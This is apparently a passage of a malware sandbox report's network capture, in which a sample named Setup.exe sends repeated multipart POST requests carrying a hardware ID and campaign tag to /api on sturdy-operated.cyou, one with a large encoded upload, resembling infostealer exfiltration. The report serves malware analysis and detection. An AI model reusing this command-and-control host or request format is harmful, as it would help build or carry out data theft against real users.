                                                                        Data Ascii: 26e1bnuksZSJwhI/6MI2cy5E3bb9KnUfqocLUvXmyLRe2nIeL+yh9Jzf6/7kpwMv50EETrgncXKS7s/ezZ78vBpnvqpriIHggd/Tx/2bYw47QDULRH8wWv7agleA7rmYJyLTJ1L1hMzN34vG+KI2Sw54KQYNBn1LnpM38kWS6JB2HqbeyziJ4LTq1uscYlZDOng5FgAfSBOujq/vwIfEXXsi6ydSvGnAvOb2n6GuhnsucBFyaB9IE4qOrkv4p
                                                                        2024-11-23 11:13:22 UTC1369INData Raw: 2b 68 6d 59 72 73 45 55 30 4b 4f 37 79 32 34 79 47 47 74 65 44 51 52 78 4f 65 42 38 52 39 70 4b 75 7a 2f 66 34 70 71 57 68 49 79 4a 65 4b 67 75 45 6f 5a 54 42 36 6e 36 62 36 4e 6f 61 51 67 4e 35 4a 56 64 45 66 7a 41 71 6b 35 2b 4b 43 36 44 6e 6a 63 30 58 62 39 64 6e 65 38 47 46 71 59 53 48 36 36 61 74 6f 77 49 47 41 79 45 6b 55 6b 6c 57 4f 51 75 66 31 38 49 57 4f 56 35 63 72 41 59 4b 44 68 4a 7a 6f 45 55 30 30 4e 4c 53 2f 2f 6a 43 52 30 34 37 51 42 68 50 4a 66 74 77 4d 71 4f 58 77 31 50 42 57 2f 32 67 49 79 50 72 4a 75 65 77 68 66 53 59 68 71 2f 7a 66 4a 5a 47 5a 34 5a 30 5a 56 4e 45 4a 33 45 4b 6b 75 36 43 4d 38 47 32 67 61 45 6a 59 38 4e 4c 5a 76 48 67 6a 63 79 6a 30 71 4c 6b 77 77 4d 75 53 33 6b 6c 42 30 52 2f 63 41 2b 66 78 34 63 53 7a 66 37 4a 76 4c
                                                                        Data Ascii: +hmYrsEU0KO7y24yGGteDQRxOeB8R9pKuz/f4pqWhIyJeKguEoZTB6n6b6NoaQgN5JVdEfzAqk5+KC6Dnjc0Xb9dne8GFqYSH66atowIGAyEkUklWOQuf18IWOV5crAYKDhJzoEU00NLS//jCR047QBhPJftwMqOXw1PBW/2gIyPrJuewhfSYhq/zfJZGZ4Z0ZVNEJ3EKku6CM8G2gaEjY8NLZvHgjcyj0qLkwwMuS3klB0R/cA+fx4cSzf7JvL


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.649745104.21.20.1784436924C:\Users\user\Desktop\Setup.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-23 11:13:23 UTC276OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=BD5E6OLD
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 12798
                                                                        Host: sturdy-operated.cyou
                                                                        2024-11-23 11:13:23 UTC12798OUTData Raw: 2d 2d 42 44 35 45 36 4f 4c 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 34 30 43 35 36 39 37 31 34 44 39 43 35 37 42 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 42 44 35 45 36 4f 4c 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 42 44 35 45 36 4f 4c 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 76 69 63 6b 0d 0a 2d 2d 42 44 35 45 36 4f 4c 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                        Data Ascii: --BD5E6OLDContent-Disposition: form-data; name="hwid"340C569714D9C57BD7CBBD6DF28D3732--BD5E6OLDContent-Disposition: form-data; name="pid"2--BD5E6OLDContent-Disposition: form-data; name="lid"yJEcaG--vick--BD5E6OLDContent-Dispositi
                                                                        2024-11-23 11:13:24 UTC1031INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 11:13:24 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=2atpcseaavj7q6aa4lnuao5q6h; expires=Wed, 19-Mar-2025 05:00:03 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R8DCIycp6CtMWxTM2iP%2Fb0g0je1zQ6kiUpNMQZ5msEFJ2Bzgc%2FoAE7VdPyo0ObSlnSLKg2o%2BVzHnmHpPLhdtdfy9vknA%2FHqeUZnadUpQzl7F%2BwoGXjpvA4N%2BtjcaQCVLJUIxXDk%2BXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e70bace5a348cc0-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1964&sent=12&recv=20&lost=0&retrans=0&sent_bytes=2851&recv_bytes=13732&delivery_rate=1466599&cwnd=249&unsent_bytes=0&cid=9aa753fa66acff29&ts=731&x=0"
                                                                        2024-11-23 11:13:24 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                        Data Ascii: eok 8.46.123.75
                                                                        2024-11-23 11:13:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.649750104.21.20.1784436924C:\Users\user\Desktop\Setup.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-23 11:13:26 UTC287OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=BS6O243W6KM6DOQ72UN
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 15110
                                                                        Host: sturdy-operated.cyou
                                                                        2024-11-23 11:13:26 UTC15110OUTData Raw: 2d 2d 42 53 36 4f 32 34 33 57 36 4b 4d 36 44 4f 51 37 32 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 34 30 43 35 36 39 37 31 34 44 39 43 35 37 42 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 42 53 36 4f 32 34 33 57 36 4b 4d 36 44 4f 51 37 32 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 42 53 36 4f 32 34 33 57 36 4b 4d 36 44 4f 51 37 32 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 76 69
                                                                        Data Ascii: --BS6O243W6KM6DOQ72UNContent-Disposition: form-data; name="hwid"340C569714D9C57BD7CBBD6DF28D3732--BS6O243W6KM6DOQ72UNContent-Disposition: form-data; name="pid"2--BS6O243W6KM6DOQ72UNContent-Disposition: form-data; name="lid"yJEcaG--vi
                                                                        2024-11-23 11:13:26 UTC1017INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 11:13:26 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=j21ch2h9psu9kmvuh5c3he86vl; expires=Wed, 19-Mar-2025 05:00:05 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xeMl3djb7KPdzY7tsc5UQuNNmXraJ1SzPCztdS3BRZNXw1PHSnKMGTGn7235nFLwaa48AmO4WLipzpSm1lSCNqdeSTeNsArgEamAYZUnS48H9JQrM5kw5pi87bVPXyYi9xMWDSGr8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e70badb4fa8728a-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1952&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2851&recv_bytes=16055&delivery_rate=1466599&cwnd=224&unsent_bytes=0&cid=cc389bcd61d97c19&ts=754&x=0"
                                                                        2024-11-23 11:13:26 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                        Data Ascii: eok 8.46.123.75
                                                                        2024-11-23 11:13:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.649756104.21.20.1784436924C:\Users\user\Desktop\Setup.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-23 11:13:28 UTC285OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=0Q58BOHIUYEM725MV
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 19956
                                                                        Host: sturdy-operated.cyou
                                                                        2024-11-23 11:13:28 UTC15331OUTData Raw: 2d 2d 30 51 35 38 42 4f 48 49 55 59 45 4d 37 32 35 4d 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 34 30 43 35 36 39 37 31 34 44 39 43 35 37 42 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 30 51 35 38 42 4f 48 49 55 59 45 4d 37 32 35 4d 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 51 35 38 42 4f 48 49 55 59 45 4d 37 32 35 4d 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 76 69 63 6b 0d 0a 2d 2d
                                                                        Data Ascii: --0Q58BOHIUYEM725MVContent-Disposition: form-data; name="hwid"340C569714D9C57BD7CBBD6DF28D3732--0Q58BOHIUYEM725MVContent-Disposition: form-data; name="pid"3--0Q58BOHIUYEM725MVContent-Disposition: form-data; name="lid"yJEcaG--vick--
                                                                        2024-11-23 11:13:28 UTC4625OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f
                                                                        Data Ascii: +?2+?2+?o?Mp5p_o
                                                                        2024-11-23 11:13:29 UTC1021INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 11:13:28 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=iepn655fnn8cfb589g2rkbh41g; expires=Wed, 19-Mar-2025 05:00:07 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rxuuqILDYY8HfUnyWqmqVlW5wH2uh4uRXlSpqhHuqNCja3gOGdDQ1dcsDKqtTcvhnuJrmuX0%2BRpUOP%2BYkZiVXE5MxlqBVPap9gahdUv6v2VrVBwVWX1HmZHpwwrD6zOIUefbIfEgnQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e70bae90d392365-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1777&sent=15&recv=24&lost=0&retrans=0&sent_bytes=2852&recv_bytes=20921&delivery_rate=1596500&cwnd=153&unsent_bytes=0&cid=68a71c3bb5510da7&ts=845&x=0"
                                                                        2024-11-23 11:13:29 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                        Data Ascii: eok 8.46.123.75
                                                                        2024-11-23 11:13:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.649762104.21.20.1784436924C:\Users\user\Desktop\Setup.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-23 11:13:30 UTC280OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=RM9FMR65RMN9V
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 1182
                                                                        Host: sturdy-operated.cyou
                                                                        2024-11-23 11:13:30 UTC1182OUTData Raw: 2d 2d 52 4d 39 46 4d 52 36 35 52 4d 4e 39 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 34 30 43 35 36 39 37 31 34 44 39 43 35 37 42 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 52 4d 39 46 4d 52 36 35 52 4d 4e 39 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 52 4d 39 46 4d 52 36 35 52 4d 4e 39 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 76 69 63 6b 0d 0a 2d 2d 52 4d 39 46 4d 52 36 35 52 4d 4e 39
                                                                        Data Ascii: --RM9FMR65RMN9VContent-Disposition: form-data; name="hwid"340C569714D9C57BD7CBBD6DF28D3732--RM9FMR65RMN9VContent-Disposition: form-data; name="pid"1--RM9FMR65RMN9VContent-Disposition: form-data; name="lid"yJEcaG--vick--RM9FMR65RMN9
                                                                        2024-11-23 11:13:31 UTC1020INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 11:13:31 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=am9m8gqfppf65ckqafolioni7j; expires=Wed, 19-Mar-2025 05:00:10 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oPMwqAZ%2F6TKym6vAbXEf5ic9zXNjWIwLRNui9l0PhWKrvBTS7Vh5SeF98smQEFJNeKWZdo0ytCMqfERbdZFs%2ByAzCNTKPBTkZY6jzvJwjiUSp%2Fl9urZrAsTI8NiI5Qq2Zs8ug4LT1A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e70baf89e9378db-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1893&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2852&recv_bytes=2098&delivery_rate=1509043&cwnd=233&unsent_bytes=0&cid=5463362e171a4ebd&ts=602&x=0"
                                                                        2024-11-23 11:13:31 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                        Data Ascii: eok 8.46.123.75
                                                                        2024-11-23 11:13:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.649769104.21.20.1784436924C:\Users\user\Desktop\Setup.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-23 11:13:32 UTC282OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=NF0RBT91GYNTB
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 553763
                                                                        Host: sturdy-operated.cyou
                                                                        2024-11-23 11:13:32 UTC15331OUTData Raw: 2d 2d 4e 46 30 52 42 54 39 31 47 59 4e 54 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 34 30 43 35 36 39 37 31 34 44 39 43 35 37 42 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 4e 46 30 52 42 54 39 31 47 59 4e 54 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 46 30 52 42 54 39 31 47 59 4e 54 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 76 69 63 6b 0d 0a 2d 2d 4e 46 30 52 42 54 39 31 47 59 4e 54
                                                                        Data Ascii: --NF0RBT91GYNTBContent-Disposition: form-data; name="hwid"340C569714D9C57BD7CBBD6DF28D3732--NF0RBT91GYNTBContent-Disposition: form-data; name="pid"1--NF0RBT91GYNTBContent-Disposition: form-data; name="lid"yJEcaG--vick--NF0RBT91GYNT
                                                                        2024-11-23 11:13:32 UTC15331OUTData Raw: f3 b0 d6 9e e5 1a 36 46 3e 6e 1f 90 4c fb 55 e9 36 5c 29 f8 e9 2d 32 c2 65 43 c4 04 ee a7 d9 b9 1c cf a8 3f 59 b1 e6 fb 63 53 a5 1b 2c e7 74 9a 29 7e 49 61 97 7e f1 36 a9 b6 4a 68 2f 80 1b 13 bd 09 53 06 52 82 57 a3 9a ab 35 11 33 85 8d d0 e6 25 30 8b dc 1a 8d 22 76 b6 36 08 ab 9f 74 49 ca 2c 9a f6 cb 1a f5 a5 d4 3d 5c 39 f9 f9 04 48 4e 0f e3 52 9f 83 be 67 45 ba 0d 32 ee 81 05 ae fa 58 35 fa ac 24 f8 ce 2e e5 fc 3b c7 5a b7 d2 03 af 78 97 f4 ca c0 6b fe 4d c5 46 58 fe 34 df a6 a6 3c ba 4b 0b ae 0d d8 17 0d 31 d0 ac 99 a4 5a 9d 11 42 be 1d d8 fc 8d 32 25 81 67 f3 17 2e b0 9f 8f 75 4e 18 68 7e 53 ae 67 a3 1a b7 23 e6 7f 96 4d 79 a9 a4 94 d2 2a 3f 5b b6 83 a5 d0 ee fe 77 c7 19 49 e8 2b f7 39 ce 7a 6f 87 5e 4b 2d 0c 16 14 ff df ed 93 0b 57 98 13 87 95 a5 4c
                                                                        Data Ascii: 6F>nLU6\)-2eC?YcS,t)~Ia~6Jh/SRW53%0"v6tI,=\9HNRgE2X5$.;ZxkMFX4<K1ZB2%g.uNh~Sg#My*?[wI+9zo^K-WL
                                                                        2024-11-23 11:13:32 UTC15331OUTData Raw: 13 9f fa 42 5d 1f ab 3a 42 2b 36 9c 2d 19 1a d4 fa c2 f3 a4 02 71 20 24 66 fa fb d7 2c 0f e0 50 60 1f 11 d1 47 3c 6b 2c e1 21 d0 94 42 c5 3c dc 0e 0e 12 5c 18 63 7e 9c 0b fb 24 c7 b3 ed 96 fb cd 4e 1b 1a 11 7b e5 40 28 c4 4a 2a bf b1 d0 36 64 bc 88 25 2a 06 c7 68 b4 ee 91 b9 04 2c de ec f8 ce 1f 9e d6 ef fe 60 dc 5e bb 61 34 5d dc 6d fb dc d6 e3 ab c6 74 2d ab a5 f6 8d cf 90 86 0a 8d 8c 85 bb 07 59 2a d3 8c bc 2a ed 6a 7a 7d f4 f7 bc a0 79 e7 e9 a7 8e 69 4f 83 47 a4 c5 df 58 d9 fa 5a 6d d7 da 6c 5d 47 50 46 69 8d 9f c4 1d f7 bd 89 21 b5 c7 81 99 01 c5 08 37 0c 03 e2 da 89 52 dd e7 fa ec cd d7 92 ac 55 b0 a4 8b 5b 18 ba 8d 06 c3 92 00 04 06 fc 0b 68 82 93 69 1a f6 60 a9 a1 45 c5 55 1b fc aa fc bd be 04 91 7b 30 15 49 61 1d 40 0f b7 c0 55 e0 f6 2f 9a f6 4d
                                                                        Data Ascii: B]:B+6-q $f,P`G<k,!B<\c~$N{@(J*6d%*h,`^a4]mt-Y**jz}yiOGXZml]GPFi!7RU[hi`EU{0Ia@U/M
                                                                        2024-11-23 11:13:32 UTC15331OUTData Raw: b7 d2 40 a2 bf ff ad 7b 59 88 43 91 c8 9e 4b 8a c3 ea df 00 61 2f d1 12 f3 12 4b fc 32 29 b7 c0 0d ce fc 84 96 bc 76 09 c5 95 73 43 3b 44 58 3f 82 da 60 a4 27 06 28 f7 9d 98 9b 2a b2 d4 9b 4b 2a 5a 45 a2 73 fc f2 cb 70 92 a1 c1 c2 37 bc 5b a9 00 6d 1f c6 ba ff 3b 2a c6 99 97 39 b5 91 79 38 ff f5 7a 77 2b 70 f1 7c 2b 01 c2 8b 4e 85 2f b5 e7 fd ca b8 77 a3 8d 6d db 29 60 db ef c9 96 ed 49 11 32 4e 36 9a 8a 74 36 24 c9 64 c9 17 95 00 56 59 e4 45 5f dc a6 91 d0 c2 74 f9 82 a2 c4 29 19 0b 9b 10 4f 9e 43 39 2d 13 20 17 9f 1f 8f e0 37 8e 25 cd 6e 9f 7e b3 8f 53 8b 2a 6d f7 04 cf 68 5f 1b b3 73 83 12 bb 7d 08 dc 78 ae 2a 13 ae 34 42 3f ab af 89 ca 5a 2c 3e 44 2b 97 60 29 8a ec 59 6b 78 44 bc 30 c9 7d a7 35 e9 ae 41 90 7c db 56 6f df b6 ce df 46 a1 ee 67 bd 2d a6
                                                                        Data Ascii: @{YCKa/K2)vsC;DX?`'(*K*ZEsp7[m;*9y8zw+p|+N/wm)`I2N6t6$dVYE_t)OC9- 7%n~S*mh_s}x*4B?Z,>D+`)YkxD0}5A|VoFg-
                                                                        2024-11-23 11:13:32 UTC15331OUTData Raw: ce 3b 74 da bc 74 ad 35 9e e4 0e 1b d4 64 4e 47 3f aa 43 42 3e 0f cf dc 20 91 5a af cd 47 4e f6 4a 68 91 6c 48 f4 e4 14 11 b6 48 ed d9 05 4c c0 6b ff 08 ea f4 9e d9 87 5a c2 a6 06 6b bd 37 05 37 77 5a 77 8f 77 3a 77 e8 25 82 60 ab 54 98 ad cc 6d f8 86 48 2e 39 36 64 e1 10 71 b4 c5 a1 71 37 88 d2 97 6a dd da a9 36 a7 80 58 d6 85 fe c4 fe e9 97 3a e0 47 6f 43 8c 2a e7 bd 8c 52 53 6c c2 33 d5 45 5f 9e e4 d8 2c da b7 48 7d 26 a9 5d 9f fd f9 4f 21 35 e3 25 6a cd fa 5d c7 0d cb 94 52 d1 f4 f6 86 12 de f9 34 ea d4 15 bb c4 79 3f 5e 43 de 5e a9 40 eb 80 48 ca 32 71 d5 ab 44 7f 7b e2 f2 15 de bd ab 55 03 c1 03 67 67 60 bf 3b fd 25 1c f3 9c aa 09 e1 29 18 51 02 f7 26 09 69 10 d0 ff 1e ee 7a 3a eb 8c e4 41 93 1e b4 4b 95 4f ad 2e c2 b4 b5 37 07 ce c8 37 e6 bd 9e a7
                                                                        Data Ascii: ;tt5dNG?CB> ZGNJhlHHLkZk77wZww:w%`TmH.96dqq7j6X:GoC*RSl3E_,H}&]O!5%j]R4y?^C^@H2qD{Ugg`;%)Q&iz:AKO.77
                                                                        2024-11-23 11:13:32 UTC15331OUTData Raw: 0b 0d 59 24 e2 74 dc 83 a3 37 6e f4 22 00 e9 aa d6 bd 21 ca 31 55 e2 64 09 9b c2 6c 65 82 43 81 2c d8 3a 30 1c 03 e5 0a 80 2f d9 5d 45 ab e9 90 be 33 60 89 93 92 d0 a8 dc b4 46 10 2b 2f 0a e4 ff bc c4 c9 03 59 66 ec 93 9f b1 53 38 d8 ac 1d 07 f2 f5 51 d1 c9 56 06 0e a5 42 81 43 11 b9 69 7c d1 c8 61 34 66 d6 ba 86 36 47 5a b0 85 1b 79 88 9d 80 8d ed 3c f0 31 5f a3 da e5 2c f2 82 00 fc cb 32 b7 36 b9 ea 12 a7 e4 23 f6 34 5d 58 ec b2 40 cc f7 d1 9d 33 97 9f 59 ca f7 5e 98 b2 47 c7 f2 66 34 4d a9 99 b2 fa e9 1a 98 ff bc 56 f7 de 04 3e f6 03 a2 c9 ad a0 6e b6 ae f1 9a cb 20 de 1d 0b 6f 64 f7 dd 73 3f 30 2a 07 47 2a 92 ce 00 64 82 57 5c 0c e4 72 af fa 8d 8d 7d 20 5d 25 92 4e 50 28 72 c8 2e ec b8 28 88 39 b4 db 0a 4f 46 28 2a d5 4e c3 7a 15 f5 8d 5a d3 41 8a 9e
                                                                        Data Ascii: Y$t7n"!1UdleC,:0/]E3`F+/YfS8QVBCi|a4f6GZy<1_,26#4]X@3Y^Gf4MV>n ods?0*G*dW\r} ]%NP(r.(9OF(*NzZA
